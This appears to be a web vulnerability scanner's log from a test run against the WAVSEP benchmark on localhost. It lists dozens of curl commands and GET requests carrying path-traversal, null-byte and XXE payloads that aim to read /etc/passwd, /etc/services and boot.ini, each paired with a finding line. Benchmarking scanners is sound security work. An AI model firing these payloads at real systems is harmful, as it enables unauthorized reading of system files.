curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=content.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
